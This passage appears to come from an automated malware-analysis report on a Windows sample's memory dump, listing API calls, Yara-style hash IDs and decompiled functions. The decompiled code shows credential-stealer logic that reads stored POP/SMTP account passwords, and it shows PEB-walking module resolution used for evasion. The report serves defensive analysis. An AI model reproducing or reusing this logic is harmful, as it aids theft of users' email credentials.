                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                                      • Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
                                      • Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                                      • Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Non-executed Functions

                                      Function 0040434D, Relevance: 15.1, APIs: 10, Instructions: 135memorycomCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CoInitialize.OLE32(00000000), ref: 0040438F
                                      • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                                      • VariantInit.OLEAUT32(?), ref: 004043C4
                                      • SysAllocString.OLEAUT32(?), ref: 004043CD
                                      • VariantInit.OLEAUT32(?), ref: 00404414
                                      • SysAllocString.OLEAUT32(?), ref: 00404419
                                      • VariantInit.OLEAUT32(?), ref: 00404431
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: InitVariant$AllocString$CreateInitializeInstance
                                      • String ID:
                                      • API String ID: 1312198159-0
                                      • Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                      • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                                      • Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                      • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040D069, Relevance: 12.6, Strings: 10, Instructions: 138COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 88%
                                      			E0040D069(void* __ebx, void* __eflags, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __edi;
				void* __esi;
				intOrPtr _t40;
				intOrPtr _t45;
				intOrPtr _t47;
				void* _t71;
				void* _t75;
				void* _t77;

				_t72 = _a4;
				_t71 = E00404BEE(__ebx,  *_a4, L"EmailAddress");
				_t81 = _t71;
				if(_t71 != 0) {
					_push(__ebx);
					_t67 = E00404BEE(__ebx,  *_t72, L"Technology");
					_v16 = E00404BEE(_t37,  *_t72, L"PopServer");
					_v40 = E00404BA7(_t81,  *_t72, L"PopPort");
					_t40 = E00404BEE(_t37,  *_t72, L"PopAccount");
					_v8 = _v8 & 0x00000000;
					_v20 = _t40;
					_v24 = E00404C4E(_t71,  *_t72, L"PopPassword",  &_v8);
					_v28 = E00404BEE(_t67,  *_t72, L"SmtpServer");
					_v44 = E00404BA7(_t81,  *_t72, L"SmtpPort");
					_t45 = E00404BEE(_t67,  *_t72, L"SmtpAccount");
					_v12 = _v12 & 0x00000000;
					_v32 = _t45;
					_t47 = E00404C4E(_t71,  *_t72, L"SmtpPassword",  &_v12);
					_t77 = _t75 + 0x50;
					_v36 = _t47;
					if(_v8 != 0 || _v12 != 0) {
						E00405872( *0x49f934, _t71, 1, 0);
						E00405872( *0x49f934, _t67, 1, 0);
						_t74 = _v16;
						E00405872( *0x49f934, _v16, 1, 0);
						E00405781( *0x49f934, _v40);
						E00405872( *0x49f934, _v20, 1, 0);
						_push(_v8);
						E00405762(_v16,  *0x49f934, _v24);
						E00405872( *0x49f934, _v28, 1, 0);
						E00405781( *0x49f934, _v44);
						E00405872( *0x49f934, _v32, 1, 0);
						_push(_v12);
						E00405762(_t74,  *0x49f934, _v36);
						_t77 = _t77 + 0x88;
					} else {
						_t74 = _v16;
					}
					E0040471C(_t71);
					E0040471C(_t67);
					E0040471C(_t74);
					E0040471C(_v20);
					E0040471C(_v24);
					E0040471C(_v28);
					E0040471C(_v32);
					E0040471C(_v36);
				}
				return 1;
			}





















                                      0x0040d070
                                      0x0040d080
                                      0x0040d084
                                      0x0040d086
                                      0x0040d08c
                                      0x0040d0a0
                                      0x0040d0ae
                                      0x0040d0bd
                                      0x0040d0c0
                                      0x0040d0c5
                                      0x0040d0c9
                                      0x0040d0e3
                                      0x0040d0f2
                                      0x0040d101
                                      0x0040d104
                                      0x0040d109
                                      0x0040d110
                                      0x0040d11e
                                      0x0040d123
                                      0x0040d126
                                      0x0040d12d
                                      0x0040d145
                                      0x0040d154
                                      0x0040d15a
                                      0x0040d166
                                      0x0040d174
                                      0x0040d186
                                      0x0040d18e
                                      0x0040d19a
                                      0x0040d1ac
                                      0x0040d1ba
                                      0x0040d1cc
                                      0x0040d1d1
                                      0x0040d1dd
                                      0x0040d1e2
                                      0x0040d1e7
                                      0x0040d1e7
                                      0x0040d1e7
                                      0x0040d1eb
                                      0x0040d1f1
                                      0x0040d1f7
                                      0x0040d1ff
                                      0x0040d207
                                      0x0040d20f
                                      0x0040d217
                                      0x0040d21f
                                      0x0040d227
                                      0x0040d230

                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                                      • API String ID: 0-2111798378
                                      • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                      • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                                      • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                      • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040317B, Relevance: .0, Instructions: 46COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 90%
                                      			E0040317B(intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				void* __ecx;
				intOrPtr _t17;
				void* _t21;
				intOrPtr* _t23;
				void* _t26;
				void* _t28;
				intOrPtr* _t31;
				void* _t33;
				signed int _t34;

				_push(_t25);
				_t1 =  &_v8;
				 *_t1 = _v8 & 0x00000000;
				_t34 =  *_t1;
				_v8 =  *[fs:0x30];
				_t23 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xc)) + 0xc));
				_t31 = _t23;
				do {
					_v12 =  *((intOrPtr*)(_t31 + 0x18));
					_t28 = E00402C77(_t34,  *((intOrPtr*)(_t31 + 0x28)));
					_pop(_t26);
					_t35 = _t28;
					if(_t28 == 0) {
						goto L3;
					} else {
						E004032EA(_t35, _t28, 0);
						_t21 = E00402C38(_t26, _t28, E00405D24(_t28) + _t19);
						_t33 = _t33 + 0x14;
						if(_a4 == _t21) {
							_t17 = _v12;
						} else {
							goto L3;
						}
					}
					L5:
					return _t17;
					L3:
					_t31 =  *_t31;
				} while (_t23 != _t31);
				_t17 = 0;
				goto L5;
			}














                                      0x0040317f
                                      0x00403180
                                      0x00403180
                                      0x00403180
                                      0x0040318d
                                      0x00403196
                                      0x00403199
                                      0x0040319b
                                      0x004031a1
                                      0x004031a9
                                      0x004031ab
                                      0x004031ac
                                      0x004031ae
                                      0x00000000
                                      0x004031b0
                                      0x004031b3
                                      0x004031c2
                                      0x004031c7
                                      0x004031cd
                                      0x004031e0
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004031cd
                                      0x004031d7
                                      0x004031dd
                                      0x004031cf
                                      0x004031cf
                                      0x004031d1
                                      0x004031d5
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                      • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
                                      • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                      • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64
                                      Uniqueness

                                      Uniqueness Score: -1.00%